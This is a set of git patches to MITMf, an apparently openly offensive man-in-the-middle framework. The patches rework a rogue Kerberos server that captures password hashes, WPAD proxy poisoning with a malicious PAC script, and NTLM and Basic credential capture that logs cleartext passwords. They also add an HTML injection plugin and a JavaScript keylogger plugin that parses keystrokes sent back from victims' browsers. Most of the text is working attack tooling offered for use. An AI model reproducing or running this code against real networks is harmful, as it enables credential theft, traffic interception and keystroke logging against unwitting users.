- SessionHijacking - Performs session hijacking attacks, and stores cookies in a firefox profile - BrowserProfiler - Attempts to enumerate all browser plugins of connected clients - CacheKill - Kills page caching by modifying headers -- FilePwn - Backdoor executables being sent over http using bdfactory +- FilePwn - Backdoor executables being sent over http using Backdoor Factory and BDFProxy - Inject - Inject arbitrary content into HTML content - JavaPwn - Performs drive-by attacks on clients with out-of-date java browser plugins - jskeylogger - Injects a javascript keylogger into clients webpages From aa4e022ab0ec9a122dfc505c2e2388cda26963dd Mon Sep 17 00:00:00 2001 From: byt3bl33d3r Date: Thu, 30 Apr 2015 00:10:55 +0200 Subject: [PATCH 07/20] Kerberos sever back online, squashed some bugs --- .../fingerprinter/LANFingerprinter.py | 16 +++- .../kerberos/KERBServer.py | 90 +++++++++---------- .../kerberos/__init__.py | 0 core/responder/nbtns/NBTNSPoisoner.py | 4 +- core/responder/wpad/WPADPoisoner.py | 48 +++++----- mitmf.py | 1 + plugins/Responder.py | 11 ++- 7 files changed, 93 insertions(+), 77 deletions(-) rename core/{protocols => responder}/kerberos/KERBServer.py (75%) rename core/{protocols => responder}/kerberos/__init__.py (100%) diff --git a/core/responder/fingerprinter/LANFingerprinter.py b/core/responder/fingerprinter/LANFingerprinter.py index a1186f8..aa0c9e1 100644 --- a/core/responder/fingerprinter/LANFingerprinter.py +++ b/core/responder/fingerprinter/LANFingerprinter.py @@ -3,9 +3,9 @@ import socket import threading import struct import logging +import string from SocketServer import UDPServer, ThreadingMixIn, BaseRequestHandler -from core.configwatcher import ConfigWatcher from core.responder.fingerprinter.RAPLANMANPackets import * mitmf_logger = logging.getLogger("mitmf") @@ -60,6 +60,20 @@ def NBT_NS_Role(data): else: return "Service not known." +def Decode_Name(nbname): + #From http://code.google.com/p/dpkt/ with author's permission. 
+ try: + if len(nbname) != 32: + return nbname + l = [] + for i in range(0, 32, 2): + l.append(chr(((ord(nbname[i]) - 0x41) << 4) | + ((ord(nbname[i+1]) - 0x41) & 0xf))) + return filter(lambda x: x in string.printable, ''.join(l).split('\x00', 1)[0].replace(' ', '')) + except Exception, e: + mitmf_logger.debug("[LANFingerprinter] Error parsing NetBIOS name: {}".format(e)) + return "Illegal NetBIOS name" + def WorkstationFingerPrint(data): Role = { "\x04\x00" :"Windows 95", diff --git a/core/protocols/kerberos/KERBServer.py b/core/responder/kerberos/KERBServer.py similarity index 75% rename from core/protocols/kerberos/KERBServer.py rename to core/responder/kerberos/KERBServer.py index 40b509f..7b6e6cf 100644 --- a/core/protocols/kerberos/KERBServer.py +++ b/core/responder/kerberos/KERBServer.py @@ -1,35 +1,37 @@ -################################################################################## -#Kerberos Server stuff starts here -################################################################################## + +import socket +import threading +import struct +import logging + +from SocketServer import UDPServer, TCPServer, ThreadingMixIn, BaseRequestHandler + +mitmf_logger = logging.getLogger("mitmf") class KERBServer(): - def serve_thread_udp(host, port, handler): + def serve_thread_udp(self, host, port, handler): try: server = ThreadingUDPServer((host, port), handler) server.serve_forever() except Exception, e: - print "Error starting UDP server on port %s: %s:" % (str(port),str(e)) + mitmf_logger.debug("[KERBServer] Error starting UDP server on port 88: {}:".format(e)) - def serve_thread_tcp(host, port, handler): + def serve_thread_tcp(self, host, port, handler): try: server = ThreadingTCPServer((host, port), handler) server.serve_forever() except Exception, e: - print "Error starting TCP server on port %s: %s:" % (str(port),str(e)) + mitmf_logger.debug("[KERBServer] Error starting TCP server on port 88: {}:".format(e)) #Function name self-explanatory - def start(Krb_On_Off): - if Krb_On_Off == "ON": - t1 = threading.Thread(name="KerbUDP", target=serve_thread_udp, args=("0.0.0.0", 88,KerbUDP)) - t2 = threading.Thread(name="KerbTCP", target=serve_thread_tcp, args=("0.0.0.0", 88, KerbTCP)) - for t in [t1,t2]: - t.setDaemon(True) - t.start() - - return t1, t2 - if Krb_On_Off == "OFF": - return False + def start(self): + mitmf_logger.debug("[KERBServer] online") + t1 = threading.Thread(name="KERBServerUDP", target=self.serve_thread_udp, args=("0.0.0.0", 88,KerbUDP)) + t2 = threading.Thread(name="KERBServerTCP", target=self.serve_thread_tcp, args=("0.0.0.0", 88, KerbTCP)) + for t in [t1,t2]: + t.setDaemon(True) + t.start() class ThreadingUDPServer(ThreadingMixIn, UDPServer): @@ -45,6 +47,28 @@ class ThreadingTCPServer(ThreadingMixIn, TCPServer): def server_bind(self): TCPServer.server_bind(self) +class KerbTCP(BaseRequestHandler): + + def handle(self): + try: + data = self.request.recv(1024) + KerbHash = ParseMSKerbv5TCP(data) + if KerbHash: + mitmf_logger.info('[KERBServer] MSKerbv5 complete hash is: {}'.format(KerbHash)) + except Exception: + raise + +class KerbUDP(BaseRequestHandler): + + def handle(self): + try: + data, soc = self.request + KerbHash = ParseMSKerbv5UDP(data) + if KerbHash: + mitmf_logger.info('[KERBServer] MSKerbv5 complete hash is: {}'.format(KerbHash)) + except Exception: + raise + def ParseMSKerbv5TCP(Data): MsgType = Data[21:22] EncType = Data[43:44] @@ -131,33 +155,3 @@ def ParseMSKerbv5UDP(Data): return BuildHash else: return False - -class 
KerbTCP(BaseRequestHandler): - - def handle(self): - try: - data = self.request.recv(1024) - KerbHash = ParseMSKerbv5TCP(data) - if KerbHash: - Outfile = "./logs/responder/MSKerberos-Client-"+self.client_address[0]+".txt" - WriteData(Outfile,KerbHash, KerbHash) - responder_logger.info('[+]MSKerbv5 complete hash is :%s'%(KerbHash)) - except Exception: - raise - -class KerbUDP(BaseRequestHandler): - - def handle(self): - try: - data, soc = self.request - KerbHash = ParseMSKerbv5UDP(data) - if KerbHash: - Outfile = "./logs/responder/MSKerberos-Client-"+self.client_address[0]+".txt" - WriteData(Outfile,KerbHash, KerbHash) - responder_logger.info('[+]MSKerbv5 complete hash is :%s'%(KerbHash)) - except Exception: - raise - -################################################################################## -#Kerberos Server stuff ends here -################################################################################## \ No newline at end of file diff --git a/core/protocols/kerberos/__init__.py b/core/responder/kerberos/__init__.py similarity index 100% rename from core/protocols/kerberos/__init__.py rename to core/responder/kerberos/__init__.py diff --git a/core/responder/nbtns/NBTNSPoisoner.py b/core/responder/nbtns/NBTNSPoisoner.py index f67160f..4563c52 100644 --- a/core/responder/nbtns/NBTNSPoisoner.py +++ b/core/responder/nbtns/NBTNSPoisoner.py @@ -4,6 +4,7 @@ import threading import socket import struct import logging +import string from SocketServer import UDPServer, ThreadingMixIn, BaseRequestHandler from core.configwatcher import ConfigWatcher @@ -105,7 +106,8 @@ def Decode_Name(nbname): l.append(chr(((ord(nbname[i]) - 0x41) << 4) | ((ord(nbname[i+1]) - 0x41) & 0xf))) return filter(lambda x: x in string.printable, ''.join(l).split('\x00', 1)[0].replace(' ', '')) - except: + except Exception, e: + mitmf_logger.debug("[NBTNSPoisoner] Error parsing NetBIOS name: {}".format(e)) return "Illegal NetBIOS name" # NBT_NS Server class. diff --git a/core/responder/wpad/WPADPoisoner.py b/core/responder/wpad/WPADPoisoner.py index a1bd1ef..7aa23f6 100644 --- a/core/responder/wpad/WPADPoisoner.py +++ b/core/responder/wpad/WPADPoisoner.py @@ -2,15 +2,17 @@ import socket import threading import logging -from HTTPPackets import * from SocketServer import TCPServer, ThreadingMixIn, BaseRequestHandler +from core.configwatcher import ConfigWatcher +from HTTPPackets import * mitmf_logger = logging.getLogger("mitmf") class WPADPoisoner(): - def start(on_off): + def start(self): try: + mitmf_logger.debug("[WPADPoisoner] online") server = ThreadingTCPServer(("0.0.0.0", 80), HTTP) t = threading.Thread(name="HTTP", target=server.serve_forever) t.setDaemon(True) @@ -25,6 +27,27 @@ class ThreadingTCPServer(ThreadingMixIn, TCPServer): def server_bind(self): TCPServer.server_bind(self) +#HTTP Server Class +class HTTP(BaseRequestHandler): + + def handle(self): + try: + while True: + self.request.settimeout(1) + data = self.request.recv(8092) + buff = WpadCustom(data,self.client_address[0]) + if buff and WpadForcedAuth(Force_WPAD_Auth) == False: + Message = "[+]WPAD (no auth) file sent to: %s"%(self.client_address[0]) + if Verbose: + print Message + mitmf_logger.info(Message) + self.request.send(buff) + else: + buffer0 = PacketSequence(data,self.client_address[0]) + self.request.send(buffer0) + except Exception: + pass#No need to be verbose.. + #Parse NTLMv1/v2 hash. 
def ParseHTTPHash(data,client): LMhashLen = struct.unpack(' Date: Mon, 4 May 2015 23:13:21 +0200 Subject: [PATCH 08/20] WPAD Poisoner back online, removed options in config file and rellative code for choosing which DNS server to use. (there really was not point in keeping it) the --basic and --force options and the EXE serving in the Responder plugin have been removed, until I can find a better way of implementing them. Modified and re-added the JS-keylogger and SMBauth plugins --- config/mitmf.conf | 19 +--- core/configwatcher.py | 3 +- core/protocols/smb/SMBserver.py | 51 ++++++++- core/responder/wpad/WPADPoisoner.py | 119 +++----------------- core/sergioproxy/ProxyPlugins.py | 3 + core/sslstrip/ClientRequest.py | 21 ++-- core/sslstrip/ServerConnection.py | 7 +- core/sslstrip/URLMonitor.py | 4 - mitmf.py | 12 +- plugins/Inject.py | 8 +- plugins/JsKeylogger.py | 167 ++++++++++++++++++++++++++++ plugins/Responder.py | 21 ++-- plugins/SMBAuth.py | 42 +++++++ 13 files changed, 312 insertions(+), 165 deletions(-) create mode 100644 plugins/JsKeylogger.py create mode 100644 plugins/SMBAuth.py diff --git a/config/mitmf.conf b/config/mitmf.conf index 614ac72..04bd575 100644 --- a/config/mitmf.conf +++ b/config/mitmf.conf @@ -28,7 +28,6 @@ #Here you can configure MITMf's internal DNS server # - resolver = dnschef #Can be set to 'twisted' or 'dnschef' ('dnschef' is highly reccomended) tcp = Off #Use the TCP DNS proxy instead of the default UDP (not fully tested, might break stuff!) port = 53 #Port to listen on ipv6 = Off #Run in IPv6 mode (not fully tested, might break stuff!) @@ -119,22 +118,8 @@ #Set this option with specific NBT-NS/LLMNR names not to respond to (default = None). Example: DontRespondTo = NAC, IPS, IDS DontRespondToName = - [[HTTP Server]] - - #Set this to On if you want to always serve a specific file to the victim. - Serve-Always = Off - - #Set this to On if you want to serve an executable file each time a .exe is detected in an URL. - Serve-Exe = Off - - #Uncomment and specify a custom file to serve, the file must exist. - Filename = config/responder/Denied.html - - #Specify a custom executable file to serve, the file must exist. 
- ExecFilename = config/responder/FixInternet.exe - - #Set your custom PAC script - WPADScript = 'function FindProxyForURL(url, host){if ((host == "localhost") || shExpMatch(host, "localhost.*") ||(host == "127.0.0.1") || isPlainHostName(host)) return "DIRECT"; if (dnsDomainIs(host, "RespProxySrv")||shExpMatch(host, "(*.RespProxySrv|RespProxySrv)")) return "DIRECT"; return "PROXY ISAProxySrv:3141; DIRECT";}' + #Set your custom PAC script + WPADScript = 'function FindProxyForURL(url, host){if ((host == "localhost") || shExpMatch(host, "localhost.*") ||(host == "127.0.0.1") || isPlainHostName(host)) return "DIRECT"; if (dnsDomainIs(host, "RespProxySrv")||shExpMatch(host, "(*.RespProxySrv|RespProxySrv)")) return "DIRECT"; return "PROXY ISAProxySrv:3141; DIRECT";}' [[HTTPS Server]] diff --git a/core/configwatcher.py b/core/configwatcher.py index e6eaaaf..c583ff4 100644 --- a/core/configwatcher.py +++ b/core/configwatcher.py @@ -44,5 +44,6 @@ class ConfigWatcher(FileSystemEventHandler): def reloadConfig(self): try: self.config = ConfigObj("./config/mitmf.conf") - except Exception, e: + except Exception as e: mitmf_logger.warning("Error reloading config file: {}".format(e)) + pass diff --git a/core/protocols/smb/SMBserver.py b/core/protocols/smb/SMBserver.py index 7922382..57c5cb3 100644 --- a/core/protocols/smb/SMBserver.py +++ b/core/protocols/smb/SMBserver.py @@ -1,12 +1,12 @@ import logging -import threading import sys +import threading from impacket import smbserver, LOG LOG.setLevel(logging.INFO) LOG.propagate = False -#logging.getLogger('smbserver').setLevel(logging.INFO) -#logging.getLogger('impacket').setLevel(logging.INFO) +logging.getLogger('smbserver').setLevel(logging.INFO) +logging.getLogger('impacket').setLevel(logging.INFO) formatter = logging.Formatter("%(asctime)s [SMBserver] %(message)s", datefmt="%Y-%m-%d %H:%M:%S") fileHandler = logging.FileHandler("./logs/mitmf.log") @@ -25,4 +25,47 @@ class SMBserver: def start(self): t = threading.Thread(name='SMBserver', target=self.server.start) t.setDaemon(True) - t.start() \ No newline at end of file + t.start() + +""" +class SMBserver(Thread): + def __init__(self): + Thread.__init__(self) + + def run(self): + # Here we write a mini config for the server + smbConfig = ConfigParser.ConfigParser() + smbConfig.add_section('global') + smbConfig.set('global','server_name','server_name') + smbConfig.set('global','server_os','UNIX') + smbConfig.set('global','server_domain','WORKGROUP') + smbConfig.set('global','log_file', 'None') + smbConfig.set('global','credentials_file','') + + # Let's add a dummy share + #smbConfig.add_section(DUMMY_SHARE) + #smbConfig.set(DUMMY_SHARE,'comment','') + #smbConfig.set(DUMMY_SHARE,'read only','no') + #smbConfig.set(DUMMY_SHARE,'share type','0') + #smbConfig.set(DUMMY_SHARE,'path',SMBSERVER_DIR) + + # IPC always needed + smbConfig.add_section('IPC$') + smbConfig.set('IPC$','comment','') + smbConfig.set('IPC$','read only','yes') + smbConfig.set('IPC$','share type','3') + smbConfig.set('IPC$','path') + + self.smb = smbserver.SMBSERVER(('0.0.0.0',445), config_parser = smbConfig) + + self.smb.processConfigFile() + try: + self.smb.serve_forever() + except: + pass + + def stop(self): + self.smb.socket.close() + self.smb.server_close() + self._Thread__stop() +""" \ No newline at end of file diff --git a/core/responder/wpad/WPADPoisoner.py b/core/responder/wpad/WPADPoisoner.py index 7aa23f6..c978338 100644 --- a/core/responder/wpad/WPADPoisoner.py +++ b/core/responder/wpad/WPADPoisoner.py @@ -1,16 +1,23 @@ import 
socket import threading import logging +import re from SocketServer import TCPServer, ThreadingMixIn, BaseRequestHandler from core.configwatcher import ConfigWatcher +from core.responder.common import * from HTTPPackets import * mitmf_logger = logging.getLogger("mitmf") class WPADPoisoner(): - def start(self): + def start(self, options): + + global args; args = options + args.forceWpadAuth = False + args.basic = False + try: mitmf_logger.debug("[WPADPoisoner] online") server = ThreadingTCPServer(("0.0.0.0", 80), HTTP) @@ -36,17 +43,14 @@ class HTTP(BaseRequestHandler): self.request.settimeout(1) data = self.request.recv(8092) buff = WpadCustom(data,self.client_address[0]) - if buff and WpadForcedAuth(Force_WPAD_Auth) == False: - Message = "[+]WPAD (no auth) file sent to: %s"%(self.client_address[0]) - if Verbose: - print Message - mitmf_logger.info(Message) + if buff and args.forceWpadAuth is False: + mitmf_logger.info("[WPADPoisoner] WPAD (no auth) file sent to: {}".format(self.client_address[0])) self.request.send(buff) else: buffer0 = PacketSequence(data,self.client_address[0]) self.request.send(buffer0) - except Exception: - pass#No need to be verbose.. + except Exception as e: + pass #Parse NTLMv1/v2 hash. def ParseHTTPHash(data,client): @@ -92,18 +96,8 @@ def ParseHTTPHash(data,client): mitmf_logger.info('[+]HTTP NTLMv2 Hostname is :%s'%(HostName)) mitmf_logger.info('[+]HTTP NTLMv2 Complete hash is :%s'%(WriteHash)) -def GrabCookie(data,host): - Cookie = re.search('(Cookie:*.\=*)[^\r\n]*', data) - if Cookie: - CookieStr = "[+]HTTP Cookie Header sent from: %s The Cookie is: \n%s"%(host,Cookie.group(0)) - mitmf_logger.info(CookieStr) - return Cookie.group(0) - else: - NoCookies = "No cookies were sent with this request" - mitmf_logger.info(NoCookies) - return NoCookies - def WpadCustom(data,client): + WPAD_Script = ConfigWatcher.getInstance().getConfig()["Responder"]['WPADScript'] Wpad = re.search('(/wpad.dat|/*\.pac)', data) if Wpad: buffer1 = WPADScript(Payload=WPAD_Script) @@ -112,12 +106,6 @@ def WpadCustom(data,client): else: return False -def WpadForcedAuth(Force_WPAD_Auth): - if Force_WPAD_Auth == True: - return True - if Force_WPAD_Auth == False: - return False - # Function used to check if we answer with a Basic or NTLM auth. def Basic_Ntlm(Basic): if Basic == True: @@ -125,77 +113,14 @@ def Basic_Ntlm(Basic): else: return IIS_Auth_401_Ans() -def ServeEXE(data,client, Filename): - Message = "[+]Sent %s file sent to: %s."%(Filename,client) - mitmf_logger.info(Message) - with open (Filename, "rb") as bk: - data = bk.read() - bk.close() - return data - -def ServeEXEOrNot(on_off): - if Exe_On_Off == "ON": - return True - if Exe_On_Off == "OFF": - return False - -def ServeEXECAlwaysOrNot(on_off): - if Exec_Mode_On_Off == "ON": - return True - if Exec_Mode_On_Off == "OFF": - return False - -def IsExecutable(Filename): - exe = re.findall('.exe',Filename) - if exe: - return True - else: - return False - -def GrabURL(data, host): - GET = re.findall('(?<=GET )[^HTTP]*', data) - POST = re.findall('(?<=POST )[^HTTP]*', data) - POSTDATA = re.findall('(?<=\r\n\r\n)[^*]*', data) - if GET: - HostStr = "[+]HTTP GET request from : %s. The HTTP URL requested was: %s"%(host, ''.join(GET)) - mitmf_logger.info(HostStr) - #print HostStr - - if POST: - Host3Str = "[+]HTTP POST request from : %s. 
The HTTP URL requested was: %s"%(host,''.join(POST)) - mitmf_logger.info(Host3Str) - #print Host3Str - if len(''.join(POSTDATA)) >2: - PostData = '[+]The HTTP POST DATA in this request was: %s'%(''.join(POSTDATA).strip()) - #print PostData - mitmf_logger.info(PostData) - #Handle HTTP packet sequence. def PacketSequence(data,client): Ntlm = re.findall('(?<=Authorization: NTLM )[^\\r]*', data) BasicAuth = re.findall('(?<=Authorization: Basic )[^\\r]*', data) - if ServeEXEOrNot(Exe_On_Off) and re.findall('.exe', data): - File = config.get('HTTP Server', 'ExecFilename') - buffer1 = ServerExeFile(Payload = ServeEXE(data,client,File),filename=File) - buffer1.calculate() - return str(buffer1) - - if ServeEXECAlwaysOrNot(Exec_Mode_On_Off): - if IsExecutable(FILENAME): - buffer1 = ServeAlwaysExeFile(Payload = ServeEXE(data,client,FILENAME),ContentDiFile=FILENAME) - buffer1.calculate() - return str(buffer1) - else: - buffer1 = ServeAlwaysNormalFile(Payload = ServeEXE(data,client,FILENAME)) - buffer1.calculate() - return str(buffer1) - if Ntlm: packetNtlm = b64decode(''.join(Ntlm))[8:9] if packetNtlm == "\x01": - GrabURL(data,client) - GrabCookie(data,client) r = NTLM_Challenge(ServerChallenge=Challenge) r.calculate() t = IIS_NTLM_Challenge_Ans() @@ -205,11 +130,8 @@ def PacketSequence(data,client): if packetNtlm == "\x03": NTLM_Auth= b64decode(''.join(Ntlm)) ParseHTTPHash(NTLM_Auth,client) - if WpadForcedAuth(Force_WPAD_Auth) and WpadCustom(data,client): - Message = "[+]WPAD (auth) file sent to: %s"%(client) - if Verbose: - print Message - mitmf_logger.info(Message) + if args.forceWpadAuth and WpadCustom(data,client): + mitmf_logger.info("[WPADPoisoner] WPAD (auth) file sent to: {}".format(client)) buffer1 = WpadCustom(data,client) return buffer1 else: @@ -218,16 +140,11 @@ def PacketSequence(data,client): return str(buffer1) if BasicAuth: - GrabCookie(data,client) - GrabURL(data,client) outfile = "./logs/responder/HTTP-Clear-Text-Password-"+client+".txt" WriteData(outfile,b64decode(''.join(BasicAuth)), b64decode(''.join(BasicAuth))) mitmf_logger.info('[+]HTTP-User & Password: %s'%(b64decode(''.join(BasicAuth)))) - if WpadForcedAuth(Force_WPAD_Auth) and WpadCustom(data,client): - Message = "[+]WPAD (auth) file sent to: %s"%(client) - if Verbose: - print Message - mitmf_logger.info(Message) + if args.forceWpadAuth and WpadCustom(data,client): + mitmf_logger.info("[WPADPoisoner] WPAD (auth) file sent to: {}".format(client)) buffer1 = WpadCustom(data,client) return buffer1 else: @@ -236,5 +153,5 @@ def PacketSequence(data,client): return str(buffer1) else: - return str(Basic_Ntlm(Basic)) + return str(Basic_Ntlm(args.basic)) \ No newline at end of file diff --git a/core/sergioproxy/ProxyPlugins.py b/core/sergioproxy/ProxyPlugins.py index dea21f4..c58cc8d 100644 --- a/core/sergioproxy/ProxyPlugins.py +++ b/core/sergioproxy/ProxyPlugins.py @@ -17,8 +17,11 @@ # import sys +import logging import inspect +mitmf_logger = logging.getLogger("mitmf") + class ProxyPlugins: ''' This class does some magic so that all we need to do in diff --git a/core/sslstrip/ClientRequest.py b/core/sslstrip/ClientRequest.py index 721438b..df60e20 100644 --- a/core/sslstrip/ClientRequest.py +++ b/core/sslstrip/ClientRequest.py @@ -192,21 +192,14 @@ class ClientRequest(Request): else: mitmf_logger.debug("[ClientRequest] Host not cached.") - - if self.urlMonitor.getResolver() == 'dnschef': + self.customResolver.port = self.urlMonitor.getResolverPort() - self.customResolver.port = self.urlMonitor.getResolverPort() - - try: - 
mitmf_logger.debug("[ClientRequest] Resolving with DNSChef") - address = str(self.customResolver.query(host)[0].address) - return defer.succeed(address) - except Exception: - mitmf_logger.debug("[ClientRequest] Exception occured, falling back to Twisted") - return reactor.resolve(host) - - elif self.urlMonitor.getResolver() == 'twisted': - mitmf_logger.debug("[ClientRequest] Resolving with Twisted") + try: + mitmf_logger.debug("[ClientRequest] Resolving with DNSChef") + address = str(self.customResolver.query(host)[0].address) + return defer.succeed(address) + except Exception: + mitmf_logger.debug("[ClientRequest] Exception occured, falling back to Twisted") return reactor.resolve(host) def process(self): diff --git a/core/sslstrip/ServerConnection.py b/core/sslstrip/ServerConnection.py index 0a64cea..3c53eb6 100644 --- a/core/sslstrip/ServerConnection.py +++ b/core/sslstrip/ServerConnection.py @@ -71,7 +71,8 @@ class ServerConnection(HTTPClient): try: user_agent = parse(self.headers['user-agent']) self.clientInfo = "{} [type:{}-{} os:{}] ".format(self.client.getClientIP(), user_agent.browser.family, user_agent.browser.version[0], user_agent.os.family) - except: + except Exception as e: + mitmf_logger.debug("[ServerConnection] Failed to parse client UA: {}".format(e)) self.clientInfo = "{} ".format(self.client.getClientIP()) mitmf_logger.info(self.clientInfo + "Sending Request: {}".format(self.headers['host'])) @@ -135,7 +136,7 @@ class ServerConnection(HTTPClient): self.isCompressed = True elif (key.lower()== 'strict-transport-security'): - mitmf_logger.info("{} Zapped a strict-trasport-security header".format(self.client.getClientIP())) + mitmf_logger.info("{} Zapped a strict-trasport-security header".format(self.clientInfo)) elif (key.lower() == 'content-length'): self.contentLength = value @@ -181,7 +182,7 @@ class ServerConnection(HTTPClient): mitmf_logger.debug("[ServerConnection] Read from server {} bytes of data".format(len(data))) data = self.replaceSecureLinks(data) - res = self.plugins.hook() + res = self.plugins.hook() data = res['data'] if (self.contentLength != None): diff --git a/core/sslstrip/URLMonitor.py b/core/sslstrip/URLMonitor.py index 9ef7b78..f306db7 100644 --- a/core/sslstrip/URLMonitor.py +++ b/core/sslstrip/URLMonitor.py @@ -53,10 +53,6 @@ class URLMonitor: return URLMonitor._instance - #This is here because I'm lazy - def getResolver(self): - return ConfigWatcher.getInstance().getConfig()['MITMf']['DNS']['resolver'].lower() - #This is here because I'm lazy def getResolverPort(self): return int(ConfigWatcher.getInstance().getConfig()['MITMf']['DNS']['port']) diff --git a/mitmf.py b/mitmf.py index d4dd7d4..349b76b 100755 --- a/mitmf.py +++ b/mitmf.py @@ -23,7 +23,6 @@ import sys import os import logging import threading -import user_agents from twisted.web import http from twisted.internet import reactor @@ -69,7 +68,7 @@ plugins = [] try: for p in plugin_classes: plugins.append(p()) -except Exception, e: +except Exception as e: print "[-] Failed to load plugin class {}: {}".format(p, e) #Give subgroup to each plugin with options @@ -148,7 +147,7 @@ strippingFactory.protocol = StrippingProxy reactor.listenTCP(args.listen, strippingFactory) for p in load: - + p.pluginReactor(strippingFactory) #we pass the default strippingFactory, so the plugins can use it p.startConfigWatch() @@ -165,12 +164,15 @@ from core.netcreds.NetCreds import NetCreds NetCreds().start(args.interface, myip) print "|_ Net-Creds v{} online".format(netcreds_version) -#Start all servers! 
+#Start DNSChef from core.dnschef.DNSchef import DNSChef DNSChef.getInstance().start() -print "|_ DNSChef v{} online\n".format(dnschef_version) +print "|_ DNSChef v{} online".format(dnschef_version) +#start the SMB server from core.protocols.smb.SMBserver import SMBserver +from impacket import version +print "|_ SMBserver online (Impacket {})\n".format(version.VER_MINOR) SMBserver().start() #start the reactor diff --git a/plugins/Inject.py b/plugins/Inject.py index a28375b..ccad52d 100644 --- a/plugins/Inject.py +++ b/plugins/Inject.py @@ -87,14 +87,13 @@ class Inject(CacheKill, Plugin): self.dtable[ip+hn] = True self.count += 1 mitmf_logger.info("%s [%s] Injected malicious html" % (ip, hn)) - return {'request': request, 'data': data} - else: - return + + return {'request': request, 'data': data} def _get_payload(self): return self._get_js() + self._get_iframe() + self.html_payload - def add_options(self,options): + def add_options(self, options): options.add_argument("--js-url", type=str, help="Location of your (presumably) malicious Javascript.") options.add_argument("--html-url", type=str, help="Location of your (presumably) malicious HTML. Injected via hidden iframe.") options.add_argument("--html-payload", type=str, default="", help="String you would like to inject.") @@ -136,7 +135,6 @@ class Inject(CacheKill, Plugin): if self.per_domain: return not ip+hn in self.dtable - #print mime return mime.find(self.mime) != -1 def _get_req_info(self, request): diff --git a/plugins/JsKeylogger.py b/plugins/JsKeylogger.py new file mode 100644 index 0000000..c84655b --- /dev/null +++ b/plugins/JsKeylogger.py @@ -0,0 +1,167 @@ +#!/usr/bin/env python2.7 + +# Copyright (c) 2014-2016 Marcello Salvati +# +# This program is free software; you can redistribute it and/or +# modify it under the terms of the GNU General Public License as +# published by the Free Software Foundation; either version 3 of the +# License, or (at your option) any later version. +# +# This program is distributed in the hope that it will be useful, but +# WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU +# General Public License for more details. 
+# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 +# USA +# + +from plugins.plugin import Plugin +from plugins.Inject import Inject +import logging + +class jskeylogger(Inject, Plugin): + name = "Javascript Keylogger" + optname = "jskeylogger" + desc = "Injects a javascript keylogger into clients webpages" + implements = ["handleResponse", "handleHeader", "connectionMade", "sendPostData"] + depends = ["Inject"] + version = "0.2" + has_opts = False + + def initialize(self, options): + Inject.initialize(self, options) + self.html_payload = self.msf_keylogger() + + def sendPostData(self, request): + #Handle the plugin output + if 'keylog' in request.uri: + + raw_keys = request.postData.split("&&")[0] + keys = raw_keys.split(",") + del keys[0]; del(keys[len(keys)-1]) + + input_field = request.postData.split("&&")[1] + + nice = '' + for n in keys: + if n == '9': + nice += "" + elif n == '8': + nice = nice.replace(nice[-1:], "") + elif n == '13': + nice = '' + else: + try: + nice += n.decode('hex') + except: + mitmf_logger.warning("%s ERROR decoding char: %s" % (request.client.getClientIP(), n)) + + #try: + # input_field = input_field.decode('hex') + #except: + # mitmf_logger.warning("%s ERROR decoding input field name: %s" % (request.client.getClientIP(), input_field)) + + mitmf_logger.warning("%s [%s] Field: %s Keys: %s" % (request.client.getClientIP(), request.headers['host'], input_field, nice)) + + def msf_keylogger(self): + #Stolen from the Metasploit module http_javascript_keylogger + + payload = """""" + + return payload \ No newline at end of file diff --git a/plugins/Responder.py b/plugins/Responder.py index fc5eab8..bea6141 100644 --- a/plugins/Responder.py +++ b/plugins/Responder.py @@ -18,13 +18,12 @@ # USA # -import sys -import os import threading from plugins.plugin import Plugin from twisted.internet import reactor from core.utils import SystemConfig + from core.responder.llmnr.LLMNRPoisoner import LLMNRPoisoner from core.responder.wpad.WPADPoisoner import WPADPoisoner from core.responder.mdns.MDNSPoisoner import MDNSPoisoner @@ -57,9 +56,9 @@ class Responder(Plugin): KERBServer().start() NBTNSPoisoner().start(options, self.ourip) LLMNRPoisoner().start(options, self.ourip) - + if options.wpad: - WPADPoisoner().start() + WPADPoisoner().start(options) if options.analyze: self.tree_output.append("Responder is in analyze mode. No NBT-NS, LLMNR, MDNS requests will be poisoned") @@ -69,10 +68,10 @@ class Responder(Plugin): def add_options(self, options): options.add_argument('--analyze', dest="analyze", action="store_true", help="Allows you to see NBT-NS, BROWSER, LLMNR requests from which workstation to which workstation without poisoning") - options.add_argument('--basic', dest="basic", default=False, action="store_true", help="Set this if you want to return a Basic HTTP authentication. If not set, an NTLM authentication will be returned") - options.add_argument('--wredir', dest="wredir", default=False, action="store_true", help="Set this to enable answers for netbios wredir suffix queries. Answering to wredir will likely break stuff on the network (like classics 'nbns spoofer' would). Default value is therefore set to False") - options.add_argument('--nbtns', dest="nbtns", default=False, action="store_true", help="Set this to enable answers for netbios domain suffix queries. 
Answering to domain suffixes will likely break stuff on the network (like a classic 'nbns spoofer' would). Default value is therefore set to False") - options.add_argument('--fingerprint', dest="finger", default=False, action="store_true", help = "This option allows you to fingerprint a host that issued an NBT-NS or LLMNR query") - options.add_argument('--wpad', dest="wpad", default=False, action="store_true", help = "Set this to start the WPAD rogue proxy server. Default value is False") - options.add_argument('--forcewpadauth', dest="forceWpadAuth", default=False, action="store_true", help = "Set this if you want to force NTLM/Basic authentication on wpad.dat file retrieval. This might cause a login prompt in some specific cases. Therefore, default value is False") - options.add_argument('--lm', dest="lm", default=False, action="store_true", help="Set this if you want to force LM hashing downgrade for Windows XP/2003 and earlier. Default value is False") + options.add_argument('--wredir', dest="wredir", default=False, action="store_true", help="Enables answers for netbios wredir suffix queries") + options.add_argument('--nbtns', dest="nbtns", default=False, action="store_true", help="Enables answers for netbios domain suffix queries") + options.add_argument('--fingerprint', dest="finger", default=False, action="store_true", help = "Fingerprint hosts that issued an NBT-NS or LLMNR query") + options.add_argument('--lm', dest="lm", default=False, action="store_true", help="Force LM hashing downgrade for Windows XP/2003 and earlier") + options.add_argument('--wpad', dest="wpad", default=False, action="store_true", help = "Start the WPAD rogue proxy server") + #options.add_argument('--forcewpadauth', dest="forceWpadAuth", default=False, action="store_true", help = "Set this if you want to force NTLM/Basic authentication on wpad.dat file retrieval. This might cause a login prompt in some specific cases. Therefore, default value is False") + #options.add_argument('--basic', dest="basic", default=False, action="store_true", help="Set this if you want to return a Basic HTTP authentication. If not set, an NTLM authentication will be returned") diff --git a/plugins/SMBAuth.py b/plugins/SMBAuth.py new file mode 100644 index 0000000..9a25de4 --- /dev/null +++ 